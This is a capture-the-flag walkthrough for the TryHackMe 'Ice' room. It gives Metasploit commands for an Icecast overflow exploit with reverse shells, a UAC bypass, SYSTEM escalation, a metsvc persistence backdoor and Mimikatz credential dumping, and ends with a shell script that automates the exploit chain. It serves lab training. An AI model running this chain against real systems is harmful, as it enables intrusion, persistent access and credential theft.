CTF Walk Through | HackProof Academy



05/12/2024 Shad Hussain
CTF Walk Through - Ice - THM

Room Link : https://tryhackme.com/r/room/ice

STEP1 -- Recon
nmap -Pn -sSV 10.10.98.252
(-Pn skips host discovery, -sS is a SYN scan, -sV grabs service versions)

FINDING
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http          Icecast streaming media server
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
49160/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

The Icecast streaming server on 8000/tcp is the foothold. 445/tcp tells us the host is DARK-PC in a WORKGROUP (not a domain), and 3389/tcp (RDP) only shows as tcpwrapped.
-------------------------------------------------------------------------------------------------------
STEP2 -- Initial access through Icecast
msfconsole -q
search icecast
use exploit/windows/http/icecast_header
show options             -- set RHOSTS to the target and LHOST to your VPN address
exploit
background the Meterpreter session (bg) so it can be used by the post modules below
-------------------------------------------------------------------------------------------------------
STEP3 -- Find a privilege escalation path
search exploit suggester
use post/multi/recon/local_exploit_suggester
set SESSION <id>         -- the id of the Icecast session (sessions -l)
run
-------------------------------------------------------------------------------------------------------
STEP4 -- UAC bypass
use exploit/windows/local/bypassuac_eventvwr
set SESSION <id>
set LHOST <attacker ip>
run
This opens a second Meterpreter session in a high-integrity (UAC-bypassed) process; that is the session used in STEP5.
-------------------------------------------------------------------------------------------------------
STEP5 -- Become SYSTEM
sessions -i 2
getprivs                 -- lists the token privileges; SeTakeOwnershipPrivilege is present (lets us take ownership of objects) but we do not need it here
ps                       -- list running processes and pick one running as NT AUTHORITY\SYSTEM
migrate <pid>            -- move Meterpreter into that process so our shell inherits its SYSTEM token
shell
whoami
nt authority\system      -- we are now SYSTEM, the highest privilege on the machine
-------------------------------------------------------------------------------------------------------
STEP6 (OPTIONAL) -- Persistence
in meterpreter
run metsvc -A            -- installs Meterpreter as a Windows service so access survives a reboot; -A starts a matching handler
Caveat: metsvc is an unauthenticated bind service, so anyone who can reach its port gets the same access. Remove it when the engagement is over.
-------------------------------------------------------------------------------------------------------
STEP7 -- Credential dumping
in meterpreter
load kiwi                -- loads the Kiwi extension (Mimikatz 2.x built into Meterpreter); help now lists the kiwi commands
creds_all                -- dumps every credential type at once

FINDING
Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================
Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================
Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)

The local user Dark's password (Password01!) is recovered in cleartext.
-------------------------------------------------------------------------------------------------------
STEP8 -- Going further and finding the flag
in meterpreter
golden_ticket_create     -- the kiwi command for forging a Kerberos TGT that authenticates anywhere in a domain. It needs the domain's krbtgt hash, so on this WORKGROUP host there is nothing to forge; it is only noted here.

from the shell
dir *.txt /s             -- list every .txt file under the current drive
dir flag* /s /p          -- look for files named flag*, one page at a time
dir /s /b flag.txt       -- same search, bare output (full paths only)
-------------------------------------------------------------------------------------------------------
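The Metasploit commands in STEP2 to STEP4 are the same every time the box is reset, so they can be driven from a resource script instead of retyped. The following is an added example, not part of the original walkthrough: a small POSIX shell function that writes an msfconsole resource (.rc) file chaining the Icecast exploit, the local exploit suggester and the eventvwr UAC bypass. The attacker address 10.9.1.2, the listener ports 4444/4445 and the assumption that the first session opened gets id 1 are placeholders for this example; the target address is the one from the nmap step. The interactive part (getprivs, ps, migrate, kiwi) is deliberately left to the operator.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): generate a Metasploit
# resource script that chains STEP2-STEP4 of the Ice room.
# Assumptions: the first Meterpreter session gets id 1; LHOST and the
# listener ports below are placeholders for the reader's own VPN address.

write_ice_rc() {
    rhost="$1"   # target, e.g. 10.10.98.252 (from the nmap step)
    lhost="$2"   # attacker IP or interface name, e.g. 10.9.1.2 or tun0 (assumed)
    out="$3"     # path of the .rc file to write

    # Refuse an obviously malformed target so a typo does not fire the
    # exploit at the wrong host; RHOSTS here must be dotted digits only.
    case "$rhost" in
        *[!0-9.]*|"") echo "bad RHOST: $rhost" >&2; return 1 ;;
    esac
    [ -n "$lhost" ] || { echo "LHOST required" >&2; return 1; }

    cat > "$out" <<EOF
# STEP2: Icecast header overflow -> first Meterpreter session (low privilege)
use exploit/windows/http/icecast_header
set RHOSTS $rhost
set LHOST $lhost
set LPORT 4444
exploit -j -z
# give the reverse shell time to call back before the session is used
sleep 15
sessions -l

# STEP3: ask Metasploit which local escalations apply to session 1
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# STEP4: UAC bypass via eventvwr; opens a second, high-integrity session
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST $lhost
set LPORT 4445
exploit -j -z
sleep 10
sessions -l
# STEP5 onward (getprivs, ps, migrate, load kiwi) stays interactive:
#   sessions -i 2
EOF
    echo "$out"
}

# Usage: write the script, then start it with: msfconsole -q -r <file>
rc="$(write_ice_rc 10.10.98.252 10.9.1.2 "${TMPDIR:-/tmp}/ice.rc")"
echo "resource script written to $rc"
```

Running both exploits with -j -z keeps them as background jobs without dropping into the session, which is what lets the later `set SESSION 1` lines run unattended; the `sleep` lines give the reverse connections time to arrive. If the session ids differ (for example after a failed first attempt), adjust the SESSION values or check `sessions -l` before running the rest.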
